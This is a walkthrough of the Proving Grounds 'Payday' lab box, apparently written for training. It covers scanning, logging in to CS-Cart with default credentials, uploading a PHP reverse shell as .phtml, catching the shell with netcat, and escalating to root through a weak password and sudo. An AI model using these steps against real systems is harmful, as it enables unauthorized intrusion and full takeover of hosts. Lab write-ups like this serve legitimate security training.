Payday
Walkthrough for Payday | Proving Grounds
Last updated
Was this helpful?
Walkthrough for Payday | Proving Grounds
Last updated
Was this helpful?
Rated Intermediate but is pretty easy and straight forward. This box has default / weak credential. We will exploit authenticated RCE vulnerability to get the initial foothold. Then we will change our user to another which has weak login credentials. Then we will exploit sudo misconfiguration to get root privilege.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt -Pn
[sudo] password for imtodess:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05 05:53 EDT
Nmap scan report for 192.168.91.39
Host is up (0.24s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imap
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/5%OT=22%CT=1%CU=41647%PV=Y%DS=2%DC=I%G=Y%TM=613493C4
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=D1%GCD=1%ISR=EF%TI=Z%II=I%TS=7)OPS(O1=M506
OS:ST11NW5%O2=M506ST11NW5%O3=M506NNT11NW5%O4=M506ST11NW5%O5=M506ST11NW5%O6=
OS:M506ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=
OS:Y%T=40%W=16D0%O=M506NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q
OS:=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD
OS:=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 40m06s, deviation: 1h37m58s, median: 6s
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: payday
| NetBIOS computer name:
| Domain name:
| FQDN: payday
|_ System time: 2021-09-05T05:54:03-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ dirsearch -u $ip /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
Output File: /home/kali/.dirsearch/reports/192.168.91.39/_21-09-05_06-08-14.txt
Error Log: /home/kali/.dirsearch/logs/errors-21-09-05_06-08-14.log
Target: http://192.168.91.39/
[06:08:16] Starting:
[06:08:23] 403 - 310B - /.ht_wsr.txt
[06:08:23] 403 - 313B - /.htaccess.bak1
[06:08:23] 403 - 313B - /.htaccess.orig
[06:08:23] 403 - 315B - /.htaccess.sample
[06:08:23] 403 - 313B - /.htaccess.save
[06:08:23] 403 - 314B - /.htaccess_extra
[06:08:23] 403 - 313B - /.htaccess_orig
[06:08:23] 403 - 311B - /.htaccessBAK
[06:08:23] 403 - 311B - /.htaccess_sc
[06:08:23] 403 - 311B - /.htaccessOLD
[06:08:23] 403 - 312B - /.htaccessOLD2
[06:08:23] 403 - 303B - /.htm
[06:08:23] 403 - 304B - /.html
[06:08:23] 403 - 310B - /.httr-oauth
[06:08:23] 403 - 309B - /.htpasswds
[06:08:23] 403 - 313B - /.htpasswd_test
[06:08:31] 200 - 1B - /Thumbs.db
[06:08:34] 301 - 333B - /addons -> http://192.168.91.39/addons/
[06:08:35] 200 - 9KB - /admin
[06:08:36] 200 - 9KB - /admin/_logs/error.log
[06:08:36] 200 - 9KB - /admin/_logs/error_log
[06:08:36] 200 - 9KB - /admin/access_log
[06:08:36] 200 - 9KB - /admin/
[06:08:36] 200 - 9KB - /admin/_logs/access.log
[06:08:36] 200 - 9KB - /admin/_logs/access-log
[06:08:36] 200 - 9KB - /admin/.config
[06:08:36] 200 - 9KB - /admin/account.php
[06:08:36] 200 - 9KB - /admin/access.txt
[06:08:36] 200 - 9KB - /admin/.htaccess
[06:08:36] 200 - 9KB - /admin/admin-login.php
[06:08:36] 200 - 9KB - /admin.php
[06:08:36] 200 - 9KB - /admin/admin.php
[06:08:36] 200 - 9KB - /admin/?/login
[06:08:36] 200 - 9KB - /admin/_logs/error-log
[06:08:36] 200 - 9KB - /admin/backup/
[06:08:36] 200 - 9KB - /admin/access.log
[06:08:36] 200 - 9KB - /admin/account
[06:08:36] 200 - 9KB - /admin/admin-login
[06:08:36] 200 - 9KB - /admin/config.php
[06:08:36] 200 - 9KB - /admin/cp
[06:08:36] 200 - 9KB - /admin/db/
[06:08:36] 200 - 9KB - /admin/default
[06:08:36] 200 - 9KB - /admin/default/login.asp
[06:08:36] 200 - 9KB - /admin/download.php
[06:08:36] 200 - 9KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[06:08:36] 200 - 9KB - /admin/admin/login
[06:08:36] 200 - 9KB - /admin/FCKeditor
[06:08:36] 200 - 9KB - /admin/adminLogin.php
[06:08:36] 200 - 9KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[06:08:36] 200 - 9KB - /admin/adminLogin
[06:08:36] 200 - 9KB - /admin/backups/
[06:08:36] 200 - 9KB - /admin/controlpanel
[06:08:37] 200 - 9KB - /admin/dumper/
[06:08:37] 200 - 9KB - /admin/error.txt
[06:08:37] 200 - 9KB - /admin/error_log
[06:08:37] 200 - 9KB - /admin/default.asp
[06:08:37] 200 - 9KB - /admin/export.php
[06:08:37] 200 - 9KB - /admin/error.log
[06:08:37] 200 - 9KB - /admin/default/admin.asp
[06:08:37] 200 - 9KB - /admin/admin_login.php
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[06:08:37] 200 - 9KB - /admin/controlpanel.php
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[06:08:37] 200 - 9KB - /admin/cp.php
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[06:08:37] 200 - 9KB - /admin/files.php
[06:08:37] 200 - 9KB - /admin/home
[06:08:37] 200 - 9KB - /admin/includes/configure.php~
[06:08:37] 200 - 9KB - /admin/index
[06:08:37] 200 - 9KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[06:08:38] 200 - 9KB - /admin/js/tinymce
[06:08:38] 200 - 9KB - /admin/js/tinymce/
[06:08:38] 200 - 9KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[06:08:38] 200 - 9KB - /admin/log
[06:08:38] 200 - 9KB - /admin/file.php
[06:08:38] 200 - 9KB - /admin/login.php
[06:08:38] 200 - 9KB - /admin/login.asp
[06:08:38] 200 - 9KB - /admin/home.php
[06:08:38] 200 - 9KB - /admin/js/tiny_mce
[06:08:38] 200 - 9KB - /admin/index.php
[06:08:38] 200 - 9KB - /admin/login.do
[06:08:38] 200 - 9KB - /admin/js/tiny_mce/
[06:08:38] 200 - 9KB - /admin/login.htm
[06:08:38] 200 - 9KB - /admin/login.html
[06:08:38] 200 - 9KB - /admin/login
[06:08:38] 200 - 9KB - /admin/login.py
[06:08:38] 200 - 9KB - /admin/logs/access-log
[06:08:38] 200 - 9KB - /admin/login.jsp
[06:08:38] 200 - 9KB - /admin/logs/access.log
[06:08:38] 200 - 9KB - /admin/login.rb
[06:08:38] 200 - 9KB - /admin/logon.jsp
[06:08:38] 200 - 9KB - /admin/logs/
[06:08:38] 200 - 9KB - /admin/logs/error.log
[06:08:38] 200 - 9KB - /admin/logs/error_log
[06:08:38] 200 - 9KB - /admin/logs/login.txt
[06:08:38] 200 - 9KB - /admin/logs/access_log
[06:08:38] 200 - 9KB - /admin/logs/err.log
[06:08:38] 200 - 9KB - /admin/manage/admin.asp
[06:08:38] 200 - 9KB - /admin/manage/login.asp
[06:08:38] 200 - 9KB - /admin/mysql/index.php
[06:08:38] 200 - 9KB - /admin/phpMyAdmin
[06:08:39] 200 - 9KB - /admin/logs/error-log
[06:08:39] 200 - 9KB - /admin/mysql2/index.php
[06:08:39] 200 - 9KB - /admin/phpMyAdmin/
[06:08:39] 200 - 9KB - /admin/phpmyadmin/
[06:08:39] 200 - 9KB - /admin/phpMyAdmin/index.php
[06:08:39] 200 - 9KB - /admin/manage
[06:08:39] 200 - 9KB - /admin/phpmyadmin/index.php
[06:08:39] 200 - 9KB - /admin/manage.asp
[06:08:39] 200 - 9KB - /admin/pMA/
[06:08:39] 200 - 9KB - /admin/pma/
[06:08:39] 200 - 9KB - /admin/mysql/
[06:08:39] 200 - 9KB - /admin/PMA/index.php
[06:08:39] 200 - 9KB - /admin/pma/index.php
[06:08:39] 200 - 9KB - /admin/pol_log.txt
[06:08:39] 200 - 9KB - /admin/portalcollect.php?f=http://xxx&t=js
[06:08:39] 200 - 9KB - /admin/private/logs
[06:08:39] 200 - 9KB - /admin/release
[06:08:39] 200 - 9KB - /admin/secure/logon.jsp
[06:08:39] 200 - 9KB - /admin/signin
[06:08:39] 200 - 9KB - /admin/sxd/
[06:08:39] 200 - 9KB - /admin/sysadmin/
[06:08:39] 200 - 9KB - /admin/phpmyadmin2/index.php
[06:08:39] 200 - 9KB - /admin/tiny_mce
[06:08:39] 200 - 9KB - /admin/upload.php
[06:08:39] 200 - 9KB - /admin/user_count.txt
[06:08:39] 200 - 9KB - /admin/web/
[06:08:39] 200 - 9KB - /admin/scripts/fckeditor
[06:08:39] 200 - 9KB - /admin/_logs/login.txt
[06:08:39] 200 - 9KB - /admin/sqladmin/
[06:08:39] 200 - 9KB - /admin/tinymce
[06:08:39] 200 - 9KB - /admin/uploads.php
[06:08:39] 200 - 9KB - /admin/_logs/access_log
[06:08:39] 200 - 9KB - /admin/_logs/err.log
[06:08:39] 200 - 9KB - /admin/admin_login
[06:08:39] 200 - 9KB - /admin/admin
[06:08:44] 301 - 334B - /catalog -> http://192.168.91.39/catalog/
[06:08:45] 403 - 307B - /cgi-bin/
[06:08:45] 301 - 334B - /classes -> http://192.168.91.39/classes/
[06:08:45] 200 - 2KB - /classes/
[06:08:46] 200 - 13B - /config
[06:08:46] 200 - 13B - /config.php
[06:08:46] 200 - 13B - /config/
[06:08:46] 200 - 13B - /config/apc.php
[06:08:46] 200 - 13B - /config/app.php
[06:08:46] 200 - 13B - /config/app.yml
[06:08:46] 200 - 13B - /config/AppData.config
[06:08:46] 200 - 13B - /config/aws.yml
[06:08:46] 200 - 13B - /config/config.inc
[06:08:46] 200 - 13B - /config/autoload/
[06:08:46] 200 - 13B - /config/database.yml.pgsql
[06:08:46] 200 - 13B - /config/database.yml_original
[06:08:46] 200 - 13B - /config/config.ini
[06:08:46] 200 - 13B - /config/database.yml~
[06:08:46] 200 - 13B - /config/db.inc
[06:08:46] 200 - 13B - /config/database.yml
[06:08:46] 200 - 13B - /config/development/
[06:08:46] 200 - 13B - /config/banned_words.txt
[06:08:46] 200 - 13B - /config/database.yml.sqlite3
[06:08:46] 200 - 13B - /config/settings/production.yml
[06:08:46] 200 - 13B - /config/databases.yml
[06:08:46] 200 - 13B - /config/site.php
[06:08:46] 200 - 13B - /config/settings.ini.cfm
[06:08:46] 200 - 13B - /config/settings.inc
[06:08:46] 200 - 13B - /config/producao.ini
[06:08:46] 200 - 13B - /config/monkcheckout.ini
[06:08:46] 200 - 13B - /config/monkdonate.ini
[06:08:46] 200 - 13B - /config/routes.yml
[06:08:46] 200 - 13B - /config/monkid.ini
[06:08:46] 200 - 13B - /config/settings.ini
[06:08:46] 200 - 13B - /config/settings.local.yml
[06:08:46] 200 - 13B - /config/xml/
[06:08:46] 200 - 13B - /config/initializers/secret_token.rb
[06:08:46] 200 - 13B - /config/master.key
[06:08:47] 301 - 331B - /core -> http://192.168.91.39/core/
[06:08:48] 403 - 303B - /doc/
[06:08:48] 403 - 307B - /doc/api/
[06:08:48] 403 - 318B - /doc/en/changes.html
[06:08:48] 403 - 317B - /doc/stable.version
[06:08:48] 403 - 318B - /doc/html/index.html
[06:08:52] 301 - 333B - /images -> http://192.168.91.39/images/
[06:08:52] 302 - 0B - /images/ -> ../index.php
[06:08:52] 200 - 2KB - /image.php
[06:08:52] 200 - 2KB - /image
[06:08:52] 301 - 334B - /include -> http://192.168.91.39/include/
[06:08:52] 302 - 0B - /include/ -> ../index.php
[06:08:53] 200 - 13B - /init/
[06:08:53] 200 - 8KB - /install
[06:08:53] 200 - 8KB - /install.php
[06:08:53] 200 - 8KB - /install/index.php?upgrade/
[06:08:53] 200 - 8KB - /install/
[06:08:53] 200 - 8KB - /install/update.log
[06:08:53] 200 - 27KB - /index
[06:08:53] 200 - 27KB - /index.php/login/
[06:08:53] 200 - 27KB - /index.php
[06:08:58] 301 - 335B - /payments -> http://192.168.91.39/payments/
[06:09:02] 403 - 312B - /server-status
[06:09:02] 403 - 313B - /server-status/
[06:09:03] 301 - 332B - /skins -> http://192.168.91.39/skins/
[06:09:07] 301 - 330B - /var -> http://192.168.91.39/var/
[06:09:07] 302 - 0B - /var/ -> ../index.php We can login with admin:admin
Quick search on cs-cart using searchsploit will give us info about its vulnerabilities.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ searchsploit cs-cart
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CS-Cart - Multiple SQL Injections | php/webapps/27030.txt
CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting | php/webapps/31443.txt
CS-Cart 1.3.3 - 'classes_dir' LFI | php/webapps/48890.txt
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion | php/webapps/1872.txt
CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting | multiple/webapps/14962.txt
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt
CS-Cart 1.3.5 - Authentication Bypass | php/webapps/6352.txt
CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection | php/webapps/8184.txt
CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection | php/webapps/33146.txt
CS-Cart 2.2.1 - 'products.php' SQL Injection | php/webapps/36093.txt
CS-Cart 4.2.4 - Cross-Site Request Forgery | php/webapps/36358.html
CS-Cart 4.3.10 - XML External Entity Injection | php/webapps/40770.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ cd ../exploit
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/exploit]
└─$ searchsploit -m php/webapps/48891.txt
Exploit: CS-Cart 1.3.3 - authenticated RCE
URL: https://www.exploit-db.com/exploits/48891
Path: /usr/share/exploitdb/exploits/php/webapps/48891.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/oscp/boxes/pg/payday/exploit/48891.txt
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/exploit]
└─$ cat 48891.txt
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
According to exploit. Cs-cart is vulnerable to file upload. We can upload the php file with .phtml extension and execute the file by going to /skins/filename.phtml
We will upload php reverse shell
## If you are using kali linux. They are already available in:
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.phpChange the ip and port accordingly and rename the extension with .phtml
Then visit admin.php?target=template_editor & Select your exploit and upload it.
You will see this if it was uploaded successfully.
Start a netcat listener and go to /skins/shell.phtml
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/exploit]
└─$ nc -nvlp 143
listening on [any] 143 ...
connect to [192.168.49.91] from (UNKNOWN) [192.168.91.39] 40441
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
06:14:49 up 26 min, 0 users, load average: 0.04, 0.13, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
From /etc/passwd file we get the username of another user.
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bashUse common credentials patrick:patrick to switch to that user.
www-data@payday:/tmp$ su patrick
Password:
patrick@payday:/tmp$ ls
linpeas.sh vmware-root
patrick@payday:/tmp$ cd
Check sudo privileges for user patrick
patrick@payday:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL We can run any command with sudo without password. Just change user to root using sudo
patrick@payday:~$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
root@payday:/home/patrick# cd
root@payday:~# id
uid=0(root) gid=0(root) groups=0(root)
root@payday:~# whoami
root
root@payday:~# cat proof.txt
b8a<REDACTED>655
